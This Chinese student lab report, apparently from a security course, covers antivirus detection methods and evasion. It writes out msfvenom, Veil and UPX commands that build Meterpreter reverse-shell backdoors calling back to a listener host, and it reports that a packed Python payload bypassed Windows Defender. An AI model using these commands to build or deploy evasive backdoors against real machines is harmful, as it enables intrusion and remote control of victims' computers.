首页 > 其他分享 >20201230张国强实验三

20201230张国强实验三

时间:2023-05-05 13:23:40浏览次数:38  
标签:python 192.168 tcp LPORT 实验 张国强 20201230 meterpreter 病毒

免杀原理

1.基础问题回答

  • 杀软是如何检测出恶意代码的?
    • 基于特征码的静态扫描技术

    在文件中寻找特定的十六进制字符串,如果找到,就可判定文件感染了某种病毒。

    • 启发式杀毒技术

    病毒要达到感染和破坏的目的,通常的行为都会有一定的行为和特征,所以可以通过分析相关的病毒指令,判断其出现的次序,或组合、排列情况等病毒的标准特征来决定文件是否感染病毒,甚至是否有“未知”病毒迹象。

    • 行为查杀技术

    根据病毒的行为特征来识别病毒,这需要对病毒行为进行详细的分类和研究,分析那些病毒共同的行为,以及正常程序的罕见行为,根据程序运行时的行为进行病毒判断和预警。将行为过程转化为杀毒软件自身可识别的行为标识符,然后与病毒库中所存贮的行为信息进行对应,并作出相应处理。

    • 虚拟机技术

    查毒引擎的虚拟机是一个软件模拟的CPU,它可以像真正CPU一样取值,译码,执行,可以模拟一段代码在真正CPU上运行得到的结果。设计虚拟机查毒的目的,就是为了对付加密变形病毒,虚拟机首先从文件中确定并读取病毒入口处代码,然后以上述工作步骤解释执行病毒头部的解密段(Decryptor),最后在执行完的结果(解密后的病毒体明文)中查找病毒的特征码。

    • 脱壳技术

    脱壳技术是一种十分常用的技术,可以对压缩文件、加壳文件、加花文件、封装类文件进行分析的技术。

  • 免杀是做什么?
    • 免杀就是让安插的后门程序不被AV软件发现。
  • 免杀的基本方法有哪些?
    • 改变特征码

    如果你手里只有EXE,可以尝试加壳技术:压缩壳技术和加密壳技术。
    如果你有shellcode(像Meterpreter),可以尝试用encode进行编码或基于payload重新编译生成可执行文件。
    如果你有源代码,可以尝试用其他语言进行重写再编译(veil-evasion)

    • 改变行为

    在通讯方式上,尽量使用反弹式连接、使用隧道技术、加密通讯数据。
    在操作模式上,尽量基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码.

    • 修改内存特征码
    • 等价替换法

    把特征码所对应的汇编指令命令中替换成功能类拟的指令

    • 通用跳转法

    把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行

    • 非常规方法

    使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
    使用社工类攻击,诱骗目标关闭AV软件。
    纯手工打造一个恶意软件

  • 开启杀软能绝对防止电脑中恶意代码吗?
    • 不能。

    首先,我们用的杀毒软件不一定是最先进的杀毒软件。其次,即使是最先进的杀毒软件,也不一定能防范所有未知的病毒。


2.实验过程

2.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

先生成一个正常的后门程序进行测试:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.178.130 LPORT=1206 -f exe > 20201230backdoor.exe 


生成jar文件并检测:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.178.130 LPORT=1206 -f jar > 20201230backdoor.jar


生成php文件并检测:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.178.130 LPORT=1206 -f raw > 20201230backdoor.php 


生成python文件并检测:

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.178.130 LPORT=1206 -f raw > 20201230backdoor.py 


更换payload重新检测:

msfvenom -p python/meterpreter/reverse_tcp_ssl LHOST=192.168.178.130 LPORT=1206 -f raw > 20201230backdoor.py 


2.2veil,加壳工具

使用veil生成一个C语言程序并检测:

veil

use Evasion     

list            

use c/meterpreter/rev_tcp.py  //一共41个payload,用一个经典的 C 语言的meterpreter/reverse_tcp

options        

set LHOST 192.168.178.130

set LPORT 1206

generate    



可以看出检测率很高,试一下go语言:
use go/meterpreter/rev_tcp.py


更高了!!将C语言文件加壳并测试:


2.3使用C + shellcode编程

生成C代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.178.130 LPORT=1206 -f c

检测一下:


2.4通过组合应用各种技术实现恶意代码免杀

veil + msfvenom 生成后门,upx 加壳

use go/shellcode_inject/virtual.py

generate

2       //用 MSF 的payload

set LHOST 192.168.178.130
set LPORT 1206




附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

环境:Win10 Microsoft Defender + 联想电脑管家
python 环境下,msf的一个 python payload 是可以绕过多数杀毒软件,直接回连成功的
msfvenom -p python/meterpreter/reverse_tcp_ssl LHOST=192.168.178.130 LPORT=1206 -f raw > 20201230test.py
win10 运行 python 文件,kali msfconsole 监听,获得 win10 shell

有一定局限性,需要有 python 环境,并用 python 运行后门文件。
接着用 pyinstaller 或 py2exe 把 python 文件 打包成 exe 文件,运行获得shell

检测一下

杀软没反应:


3.实验体会

本次实验让我感受到了杀毒软件并不是真正的保护伞,虽然说目前基本没有黑客愿意花时间、精力和金钱攻击个人电脑,但不怕一万就拍万一。同时学到了病毒的制作技术,和杀软的技术 肯定是相互促进的。不会制作病毒,也就做不出好的杀毒软件。所说基于行为的检测机制,能防范一些未知的病毒,但现在一定存在着能够绕过行为检测的病毒。最后理解了杀毒软件的工作原理,和病毒免杀的基本方法,受益匪浅。

标签:python,192.168,tcp,LPORT,实验,张国强,20201230,meterpreter,病毒
From: https://www.cnblogs.com/RookieHacker1230/p/17373825.html

相关文章

  • 2023.5.5 面向对象程序设计实验报告
    实验项目名称:模板一、实验目的1、熟练掌握函数模板和类模板的定义格式。2、熟练运用函数模板和类模板解决实际问题。二、实验内容1、复数类Complex有两个数据成员:a和b,分别代表复数的实部和虚部,并有若干构造函数和一个重载-(减号,用于计算两个复数的距离)的成员函数。要求设计......
  • 网络对抗实验六 MSF应用基础--20201313
    《网络对抗技术》——Exp6MSF应用基础目录《网络对抗技术》——Exp6MSF应用基础一、实践内容二、问题回答三、实践过程实验准备:1、一个主动攻击实践ms08_067_netapi2、一个针对浏览器的攻击ms10_018_ie_behaviors3、一个针对客户端的攻击Wireshark4、成功应用一个辅助模块sniff......
  • 网络对抗实验六 MSF应用基础
    Exp6MSF应用基础实验目标1.1一个主动攻击实践,尽量使用最新的类似漏洞;(1分)1.2一个针对浏览器的攻击,尽量使用最新的类似漏洞;(1分)1.3一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;(1分)1.4成功应用任何一个辅助模块。(1分)实验内容0实验准备0.1实验原理0.1.......
  • pta实验报告2
    模板与类(对象数组)#include<bits/stdc++.h>usingnamespacestd;template<classT>Tmaxn(Tx[],intlen){ inti=1; Tmax=x[0]; for(i;i<len;i++) { if(max<x[i]) max=x[i]; } returnmax;}classDate{ private: intyear=0,month=0,day=0; public: Date()......
  • 网络对抗实验六 MSF应用基础
    目录实践内容一、主动攻击实践二、针对浏览器的攻击三、针对客户端的攻击四、应用一个辅助模块问题回答一、基础问题回答1.用自己的话解释什么是exploit,payload,encode.二、实践总结与体会实践内容一、主动攻击实践关闭靶机防火墙打开445端口查看版本msfconsolesearchs......
  • 快速学习HCIE培训实战-SDWAN综合实验-WOLFLAB
    快速学习HCIE培训实战-SDWAN综合实验-WOLFLAB技术编辑:WOLFLAB崔志鹏SDWAN实验需求:参考视频:https://edu.51cto.com/course/33648.html①iMasterNCE-Campus部署在Internet,南向地址为192.168.9.148,端口号为10020;业务面地址为192.168.9.147,端口号为18008;②站点分别为Site_Y与Site_Stor......
  • 工程数学--实验五:MATLAB 最优化工具箱的使用
    (1)线性规划应用案例的求解 %构造线性规划模型f=[-1500;-1200;-1800];A=[450,600,900;35,25,30;400,400,300];b=[63000;3300;33000];lb=[0;0;0];%调用linprog函数求解[x,fval]=linprog(f,A,b,[],[],lb);其中,变量f是目标函数......
  • 工程数学实验1
    代码:a=0;b=1;f=@(x)x*x-sin(x);eps=0.08;%区间精度可以修改while((b-a)>=eps)   x1=a+0.382*(b-a);   x2=a+0.618*(b-a);   disp(['x1=',num2str(x1)]);   disp(['x2=',num2str(x2)]);   iff(x1)<f(x2)      ......
  • 工程数学--上机实验四:共轭梯度法程序设计
    首先,根据目标函数,我们计算其梯度和海森矩阵:symsx1x2;f=100*(x2-x1^2)^2+(1-x1)^2;grad_f=gradient(f,[x1,x2]);grad_f_fun=matlabFunction(grad_f);hes_f=hessian(f,[x1,x2]);hes_f_fun=matlabFunction(hes_f);其中,grad_f_fun和hes_f_fun是把符号......
  • 工程数学--上机实验二:最速下降法程序设计
    这是一个无约束优化问题,可以使用最速下降法(也称负梯度法)求解。按照要求,我来给出MATLAB代码:、%定义目标函数f=@(x)100*(x(2)-x(1)^2)^2+(1-x(1))^2;%最速下降法求解%设定初始点和迭代终止准则x0_list=[-2,2;-3,3;0.5,-1.5];%多个不同的初始点max_iter=1......